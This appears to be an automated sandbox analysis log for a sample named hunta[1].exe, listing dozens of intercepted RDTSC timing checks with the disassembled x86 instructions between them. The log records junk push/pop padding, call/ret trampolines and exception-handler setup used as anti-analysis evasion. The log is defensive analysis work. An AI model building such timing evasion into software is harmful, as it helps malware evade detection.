Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1174D26 second address: 1174D5F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 js 00007FF2E55A2C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007FF2E55A2C41h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 jnc 00007FF2E55A2C26h 0x0000001d pop ebx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11785CF second address: 11785EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 117889D second address: 11788AE instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF2E55A2C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11788AE second address: 11788B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 117897D second address: 1178982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1178982 second address: 1178987 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1178987 second address: 1178995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1178B17 second address: 1178B27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 117BA2F second address: 117BA37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 117BA37 second address: 117BA80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 movzx esi, ax 0x0000000c push 00000000h 0x0000000e or si, ABC4h 0x00000013 push edx 0x00000014 sub edi, dword ptr [ebp+122D2232h] 0x0000001a pop edi 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007FF2E5514DE8h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 0000001Ah 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 push eax 0x00000038 jo 00007FF2E5514DEEh 0x0000003e push esi 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 117CC1E second address: 117CC22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 117C293 second address: 117C297 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 117CC22 second address: 117CC38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 117C297 second address: 117C2A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 117C2A1 second address: 117C2A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 117C2A5 second address: 117C2B3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 117D4E8 second address: 117D4EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 117C2B3 second address: 117C2B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 117D85D second address: 117D86B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 117C2B7 second address: 117C2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 117D86B second address: 117D870 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 117F7ED second address: 117F7F7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF2E5514DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 117F52B second address: 117F53D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF2E55A2C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007FF2E55A2C2Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 117F7F7 second address: 117F81C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF2E5514DEEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1180316 second address: 118031C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 118031C second address: 1180321 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1182CE4 second address: 1182D2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 and di, 836Ah 0x0000000d and ebx, 61A24A19h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FF2E55A2C28h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov ebx, ecx 0x00000031 mov dword ptr [ebp+1244C063h], edi 0x00000037 push 00000000h 0x00000039 mov bl, 7Eh 0x0000003b push eax 0x0000003c push esi 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1185B82 second address: 1185B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1185B86 second address: 1185B9D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF2E55A2C2Bh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1185B9D second address: 1185BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FF2E5514DE6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1185BAC second address: 1185C00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FF2E55A2C28h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 movsx edi, dx 0x00000025 push 00000000h 0x00000027 sub dword ptr [ebp+122D1F90h], ecx 0x0000002d push 00000000h 0x0000002f clc 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FF2E55A2C38h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1182F2A second address: 1182F41 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF2E5514DECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1185DAD second address: 1185DB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1182F41 second address: 1182F45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1182F45 second address: 1182F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1185DB3 second address: 1185E43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FF2E5514DE6h 0x00000009 jmp 00007FF2E5514DF0h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 call 00007FF2E5514DECh 0x00000017 mov ebx, 48FACC06h 0x0000001c pop ebx 0x0000001d push dword ptr fs:[00000000h] 0x00000024 push edi 0x00000025 pop ebx 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d push 00000000h 0x0000002f push eax 0x00000030 call 00007FF2E5514DE8h 0x00000035 pop eax 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a add dword ptr [esp+04h], 0000001Dh 0x00000042 inc eax 0x00000043 push eax 0x00000044 ret 0x00000045 pop eax 0x00000046 ret 0x00000047 mov eax, dword ptr [ebp+122D00B9h] 0x0000004d mov ebx, dword ptr [ebp+122D2A05h] 0x00000053 push FFFFFFFFh 0x00000055 pushad 0x00000056 xor bx, 9051h 0x0000005b mov dl, ADh 0x0000005d popad 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FF2E5514DF0h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1187A68 second address: 1187AE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b jmp 00007FF2E55A2C2Eh 0x00000010 pop ebx 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007FF2E55A2C28h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c jmp 00007FF2E55A2C35h 0x00000031 push 00000000h 0x00000033 or dword ptr [ebp+122D2387h], eax 0x00000039 push 00000000h 0x0000003b mov ebx, eax 0x0000003d xchg eax, esi 0x0000003e jng 00007FF2E55A2C2Ch 0x00000044 pushad 0x00000045 push ecx 0x00000046 pop ecx 0x00000047 push edi 0x00000048 pop edi 0x00000049 popad 0x0000004a push eax 0x0000004b pushad 0x0000004c pushad 0x0000004d push ecx 0x0000004e pop ecx 0x0000004f pushad 0x00000050 popad 0x00000051 popad 0x00000052 pushad 0x00000053 pushad 0x00000054 popad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1185E43 second address: 1185E49 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1185E49 second address: 1185E4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1185E4F second address: 1185E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1188A09 second address: 1188A2D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF2E55A2C32h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FF2E55A2C28h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1188A2D second address: 1188A33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1188A33 second address: 1188A98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FF2E55A2C28h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 pushad 0x00000029 mov bx, si 0x0000002c sub dword ptr [ebp+122D2173h], edx 0x00000032 popad 0x00000033 push 00000000h 0x00000035 mov edi, dword ptr [ebp+122D2931h] 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FF2E55A2C2Eh 0x00000043 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1187BF6 second address: 1187BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1187BFB second address: 1187C91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jng 00007FF2E55A2C26h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FF2E55A2C28h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov edi, dword ptr [ebp+122D2A31h] 0x0000002f or ebx, 2D33E831h 0x00000035 push dword ptr fs:[00000000h] 0x0000003c mov di, FF36h 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 mov bl, FBh 0x00000049 jmp 00007FF2E55A2C33h 0x0000004e mov eax, dword ptr [ebp+122D09EDh] 0x00000054 movzx ebx, di 0x00000057 push FFFFFFFFh 0x00000059 mov ebx, dword ptr [ebp+122D29E9h] 0x0000005f jmp 00007FF2E55A2C2Dh 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007FF2E55A2C36h 0x0000006c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1189B93 second address: 1189B97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1189B97 second address: 1189C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov di, CDE4h 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FF2E55A2C28h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov ebx, dword ptr [ebp+122D270Eh] 0x0000002e mov ebx, dword ptr [ebp+122D2975h] 0x00000034 or edi, dword ptr [ebp+122D20DDh] 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push eax 0x0000003f call 00007FF2E55A2C28h 0x00000044 pop eax 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 add dword ptr [esp+04h], 00000015h 0x00000051 inc eax 0x00000052 push eax 0x00000053 ret 0x00000054 pop eax 0x00000055 ret 0x00000056 jno 00007FF2E55A2C2Ch 0x0000005c push eax 0x0000005d push ecx 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FF2E55A2C30h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 118AC0C second address: 118AC78 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 clc 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007FF2E5514DE8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 stc 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push edi 0x0000002b call 00007FF2E5514DE8h 0x00000030 pop edi 0x00000031 mov dword ptr [esp+04h], edi 0x00000035 add dword ptr [esp+04h], 0000001Ch 0x0000003d inc edi 0x0000003e push edi 0x0000003f ret 0x00000040 pop edi 0x00000041 ret 0x00000042 jg 00007FF2E5514DECh 0x00000048 xchg eax, esi 0x00000049 pushad 0x0000004a push edx 0x0000004b push ecx 0x0000004c pop ecx 0x0000004d pop edx 0x0000004e pushad 0x0000004f je 00007FF2E5514DE6h 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 118CCB1 second address: 118CD17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FF2E55A2C26h 0x00000009 jp 00007FF2E55A2C26h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 je 00007FF2E55A2C3Dh 0x00000019 js 00007FF2E55A2C37h 0x0000001f jmp 00007FF2E55A2C31h 0x00000024 nop 0x00000025 mov edi, ecx 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007FF2E55A2C28h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 00000015h 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 mov di, C1C1h 0x00000047 sbb bl, FFFFFFFCh 0x0000004a push 00000000h 0x0000004c mov ebx, 5DFAFA11h 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 118CD17 second address: 118CD2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E5514DF0h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 118CD2C second address: 118CD31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 118DBBC second address: 118DC12 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 mov ebx, 7CCC69DDh 0x0000000d push 00000000h 0x0000000f mov edi, dword ptr [ebp+122D2A85h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007FF2E5514DE8h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 0000001Bh 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 jmp 00007FF2E5514DF7h 0x00000036 xchg eax, esi 0x00000037 pushad 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 118DC12 second address: 118DC38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007FF2E55A2C34h 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 118DC38 second address: 118DC3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 118AE22 second address: 118AE2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1190C9B second address: 1190C9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 118FEF1 second address: 118FEF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 118FEF5 second address: 118FEF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1198BE4 second address: 1198BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1198BEA second address: 1198C1A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnl 00007FF2E5514DE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FF2E5514DF6h 0x00000012 pushad 0x00000013 js 00007FF2E5514DE6h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1198C1A second address: 1198C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1198D89 second address: 1198D8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 1137B09 second address: 1137B23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C36h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 119E65D second address: 119E663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 119E663 second address: 119E667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11A46F7 second address: 11A46FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11A499C second address: 11A49A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF2E55A2C26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11A49A6 second address: 11A49AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11A49AA second address: 11A49B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11A4B25 second address: 11A4B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FF2E5514DF2h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11A4B3E second address: 11A4B43 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11A4CBF second address: 11A4CDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E5514DF8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe	RDTSC instruction interceptor: First address: 11A4CDB second address: 11A4CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
